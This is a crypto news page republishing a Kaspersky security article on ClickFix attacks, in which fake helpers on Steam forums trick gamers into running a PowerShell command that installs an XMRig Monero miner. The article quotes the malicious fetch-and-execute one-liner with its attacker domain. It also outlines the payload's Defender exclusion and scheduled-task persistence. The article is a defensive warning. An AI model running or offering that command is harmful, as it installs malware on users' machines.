logo
  • Consent
  • Details
  • [#IABV2SETTINGS#]
  • About
This website uses cookies
We use cookies to personalise content and ads, to provide social media features and to analyse our traffic. We also share information about your use of our site with our social media, advertising and analytics partners who may combine it with other information that you’ve provided to them or that they’ve collected from your use of their services.
[#GPC_BANNER_ICON#]
[#GPC_TOAST_TEXT#]
Consent Selection
Show details
Details
  • Necessary cookies help make a website usable by enabling basic functions like page navigation and access to secure areas of the website. The website cannot function properly without these cookies.
    • Pexels
      1
      Learn more about this provideropens in a new window
      _cfuvidThis cookie is a part of the services provided by Cloudflare - Including load-balancing, deliverance of website content and serving DNS connection for website operators.
      Maximum Storage Duration: SessionType: HTTP Cookie
    • ambcrypto.com
      benzinga.com
      bitcoinmagazine.com
      coingape.com
      decrypt.co
      image.coinpedia.org
      pexels.com
      7
      __cf_bm [x7]This cookie is used to distinguish between humans and bots. This is beneficial for the website, in order to make valid reports on the use of their website.
      Maximum Storage Duration: 1 dayType: HTTP Cookie
    • newslayer.com
      1
      CookieConsentStores the user's cookie consent state for the current domain
      Maximum Storage Duration: 1 yearType: HTTP Cookie
  • Preference cookies enable a website to remember information that changes the way the website behaves or looks, like your preferred language or the region that you are in.
    • We do not use cookies of this type.

  • Statistic cookies help website owners to understand how visitors interact with websites by collecting and reporting information anonymously.
    • We do not use cookies of this type.

  • Marketing cookies are used to track visitors across websites. The intention is to display ads that are relevant and engaging for the individual user and thereby more valuable for publishers and third party advertisers.
    • We do not use cookies of this type.

  • Unclassified cookies are cookies that we are in the process of classifying, together with the providers of individual cookies.
    • newslayer.com
      3
      __emg_sidPending
      Maximum Storage Duration: 1 dayType: HTTP Cookie
      __emg_vidPending
      Maximum Storage Duration: 1 yearType: HTTP Cookie
      nl-read-countPending
      Maximum Storage Duration: PersistentType: HTML Local Storage
Cross-domain consent[#BULK_CONSENT_DOMAINS_COUNT#]
[#BULK_CONSENT_TITLE#]
List of domains your consent applies to: [#BULK_CONSENT_DOMAINS#]
Cookie declaration last updated on 8/12/26 by Cookiebot
[#IABV2_TITLE#]
[#IABV2_BODY_INTRO#]
[#IABV2_BODY_LEGITIMATE_INTEREST_INTRO#]
[#IABV2_BODY_PREFERENCE_INTRO#]
[#IABV2_BODY_PURPOSES_INTRO#]
[#IABV2_BODY_PURPOSES#]
[#IABV2_BODY_FEATURES_INTRO#]
[#IABV2_BODY_FEATURES#]
[#IABV2_BODY_PARTNERS_INTRO#]
[#IABV2_BODY_PARTNERS#]
About
Cookies are small text files that can be used by websites to make a user's experience more efficient.

The law states that we can store cookies on your device if they are strictly necessary for the operation of this site. For all other types of cookies we need your permission.

This site uses different types of cookies. Some cookies are placed by third party services that appear on our pages.

You can at any time change or withdraw your consent from the Cookie Declaration on our website.

Learn more about who we are, how you can contact us and how we process personal data in our Privacy Policy.

Please state your consent ID and date when you contact us regarding your consent.
NewsLayer

Install NewsLayer

Get the app experience — one tap from your home screen, instant loads and breaking-news alerts.

NewsLayer.com
LatestDaily BriefMarkets
NewsLayer PulseLIVE₿BTC$64,200-0.10%ΞETH$1,909+0.44%◎SOL$76.78+1.15%✕XRP$0.9993+0.20%ÐDOGE$0.0699+0.02%₳ADA$0.1753+1.23%Total Cap$2.30T+0.29%24H Vol$200.3BLayer Index44 Neutral
Crypto
External ReportingPublicado há 2 dias

ClickFix on Steam forums: how malicious PowerShell commands install a crypto miner

This year has seen a real boom in ClickFix attacks. It’s such a hit with criminals that we barely finish writing about one variation before it’s time to cover the next.

ClickFix on Steam forums: how malicious PowerShell commands install a crypto miner
Publisher kaspersky.com 5 min de leitura
Image via kaspersky.com
Traduzindo…

Layer Index

44

Neutral

Layer Index

↓ 1 pts in 24h

This year has seen a real boom in ClickFix attacks. It’s such a hit with criminals that we barely finish writing about one variation before it’s time to cover the next.

This time, attackers are targeting gamers: tech journalists spotted posts pushing malicious tips on Steam forums. Here’s what these posts look like, what malware they’re used to spread, and how to keep your device safe.

ClickFix finds its way onto Steam forums

Many gamers turn to their fellow players on Steam forums for help and advice on things like beating a tricky quest, leveling up, scoring the best loot, or working around a bug. And it’s precisely this trust in community advice that attackers have decided to exploit.

The attack starts when criminals reply to someone’s question about game crashes, missing inventory items, or other technical issues. Posing as helpful commenters, they suggest opening PowerShell as an administrator and running a command that supposedly fixes the issue the user is having.

Disguising their post as troubleshooting advice, the malicious actor suggests running PowerShell as an administrator and executing a command that supposedly fixes the user’s issue. Source

As you might guess, running the command doesn’t fix anything — it just opens a whole new can of worms. That’s the whole idea behind ClickFix: using social engineering to trick victims into carrying out unsafe actions themselves while giving the scammers what they need to compromise the device. We’ve covered other ClickFix tricks before — fake CAPTCHAs, bogus browser errors, and more — all of which rely on getting the victim to run the malicious command on their own. You can read more about the different variations of ClickFix attacks in our earlier post.

The guile of using ClickFix on Steam forums is that the attack may hit not only the player who asked for help; plenty of other gamers who run into the same issue and find the answer via a Google search can fall for it too.

Reach crypto's most engaged readers — advertise mid-article on NewsLayer
Sponsored

Reach crypto's most engaged readers — advertise mid-article on NewsLayer

NewsLayer

Ad

A quick primer: what’s really behind the irm | iex command

Before we get into what attackers actually trick gamers into installing this way, we need to cover some technical background. So, first off, the posts on Steam forums advise unsuspecting would-be victims to run the following command in PowerShell:

irm msfconfig.icu | iex

To someone not intimately familiar with PowerShell, this line might look fairly innocuous — it resembles launching MSConfig, Windows’ built-in system configuration utility, with a few extra parameters.

In reality, though, it’s anything but harmless. Let’s break down what each part of this command actually does:

  1. irm is short for the built-in PowerShell command Invoke-RestMethod. It reaches out to the web address specified later in the line and retrieves data in response.
  2. icu is that web address — not the name of some local file as it might appear at first glance. This is the attackers’ server, and it responds to the irm request with a malicious PowerShell script.
  3. iex is another built-in PowerShell command, Invoke-Expression. It takes whatever irm receives from that web address and executes it as PowerShell code.

Once run, this line of PowerShell code downloads a script from the specified site and immediately executes it. As one Reddit user rightly pointed out, you can safely find out what code would actually be downloaded to your device — without the risk of it running — just by deleting the second part, iex. Without it, the command will simply download the script’s contents and print them to the PowerShell window without executing them. This gives you the full, unobscured code that you’re being asked to run on your device. Next, let’s look at what these helpful Steam forum posters are actually trying to get gamers to install on their machines.

A crypto miner, not an optimization tool

The attackers did their homework: the PowerShell script downloaded from their server does a convincing job of mimicking a Windows optimization utility. Once launched, it shows the user a series of notifications claiming to clear temporary files, flush the DNS cache, update drivers, check the disk for errors, disable unnecessary startup apps, scan the system for malware, repair the Windows image, and verify system file integrity.

The script displays a stream of messages about various fake optimization tasks to make it look like it’s doing useful maintenance. Source

The real activity, meanwhile, happens behind the scenes. The script starts by checking whether it’s running with administrator privileges. If it is, it creates a hidden working folder at C:\Windows\Background, and adds it to Microsoft Defender’s exclusion list. From that point on, any files placed in that folder cease to be scanned by Windows’ built-in antivirus.

Next, the script preps the system for the next stage of the attack and downloads an executable from the attackers’ server — saving it into that same C:\Windows\Background folder under the legitimate-sounding name system.exe.

The downloaded file is XMRig, one of the most popular tools for mining the Monero cryptocurrency. XMRig itself isn’t malware; it’s a legitimate, open-source mining tool. The problem is that attackers install it on victims’ computers without their knowledge. Once it’s running, the device’s computing power gets hijacked for Monero mining, with the resulting cryptocurrency going straight to the criminals.

This makes gamers’ rigs especially appealing targets: modern gaming PCs pack powerful CPUs and GPUs — exactly the kind of hardware that’s great for mining crypto.

To make sure the malware survives a reboot, the script also creates a new task in Windows Task Scheduler: XMRig-{computer name}. From then on, it automatically launches the crypto miner every time the system starts up.

How to protect your device from crypto miners and other malware

Unfortunately, many gamers are reluctant to install security software — or keep it running — on their devices. The main culprit is the persistent myth that “an antivirus slows down your game”. We’ve covered research on this on our blog before, and the results showed no significant performance hit from running an antivirus while playing.

The same can’t be said for crypto miners, though — they definitely hurt performance, and they wear down your hardware faster to boot. So what can you do to keep your gaming PC and accounts out of harm’s way?

  • Avoid running PowerShell, Terminal, or other command prompt scripts that strangers suggest you copy and execute — whether on forums, in chats, or in comments.
  • Before hitting Enter on any command you don’t fully understand, look up what it does and the potential fallout from running it.
  • Use a reliable security solution with a gaming mode that will flag malware download attempts in time and block them from running.
  • Don’t turn off protection while you play. Using a solution with a dedicated gaming mode is the way to go. Kaspersky security products automatically activate that mode as soon as a game launches, holding off antivirus database updates, notifications, and scheduled disk scans until you’re done playing.

Curious how else attackers target gamers? Check out our other posts:

Última Hora

Não perca nenhuma notícia de última hora

Seguir no X Entrar no Telegram

Advertisement

House — Advertise on NewsLayer
NewsLayerAd
#crypto

Sourced by

Originally reported by kaspersky.com

NewsLayer coverage based on externally reported material.

The Daily Brief

The onchain economy, before your day starts.

Curated markets, onchain insights, and key headlines — delivered every weekday morning.

Weekdays · Free · ~5 minute read

Layer Index

44

Neutral

Layer Index

↓ 1 pts in 24h

Última Hora

Não perca nenhuma notícia de última hora

Seguir no X Entrar no Telegram

Advertisement

House — Advertise on NewsLayer
NewsLayerAd

Notícias Relacionadas

Wintermute: Rompimento da faixa de preço do Bitcoin é adiado por saídas de ETFs e vendas de mineradoresRADAR DE ETF

Wintermute: Rompimento da faixa de preço do Bitcoin é adiado por saídas de ETFs e vendas de mineradores

Wintermute: Rompimento da faixa de preço do Bitcoin é adiado por saídas de ETFs e vendas de mineradores CryptoPotato

há 2 horas

2 min de leitura
Startup de exchange de cripto Arbeat, dos Emirados Árabes Unidos, obtém licença VASP total da VARA de DubaiNOTÍCIAS CRIPTO

Startup de exchange de cripto Arbeat, dos Emirados Árabes Unidos, obtém licença VASP total da VARA de Dubai

A startup de exchange de cripto Arbeat, dos Emirados Árabes Unidos, obtém licença VASP total da VARA de Dubai fxnewsgroup.com

há 6 minutos

1 min de leitura
Perspectiva de preço do XRP antes da reunião sobre cripto na White House hoje — O que vem a seguir?RADAR REGULATÓRIO

Perspectiva de preço do XRP antes da reunião sobre cripto na White House hoje — O que vem a seguir?

Perspectiva de preço do XRP antes da reunião sobre cripto na White House hoje — O que vem a seguir? CoinGape

há 12 minutos

3 min de leitura
IPO da fabricante de robôs Unitree dispara 600%, superando apostas de pré-mercado de traders de criptoMERCADO EM ALTA

IPO da fabricante de robôs Unitree dispara 600%, superando apostas de pré-mercado de traders de cripto

O IPO da fabricante de robôs Unitree dispara 600%, superando as apostas de pré-mercado de traders de cripto CoinDesk

há 16 minutos

1 min de leitura
NewsLayer.com

The front page of the onchain economy. Crypto, Web3 and regulation intelligence — live prices, original research and policy tracking in one layer.

Follow on XTelegram

News

  • Latest News
  • The Daily Brief
  • Crypto
  • DeFi
  • Web3
  • Blockchain
  • Policy
  • Explainers

Markets & Tools

  • Market News
  • Live Charts
  • Layer Index
  • Regulation Tracker
  • Regulation Radar
  • Research
  • NewsLayer Originals
  • My Feed
  • Search

Company

  • About NewsLayer
  • Go Premium
  • Advertise
  • PR Publication
  • Become an Author
  • Create Account
  • Sign in

© 2026 NewsLayer.com — The front page of the onchain economy·Privacy Policy·Terms of Service

NewsLayer

Get the signal, not the noise.

Markets, regulation and onchain intelligence in a 5-minute morning read — plus breaking alerts and Layer Index flips as they happen.

The Daily Brief

Breaking alerts

Index flips

Free · No spam · Unsubscribe anytime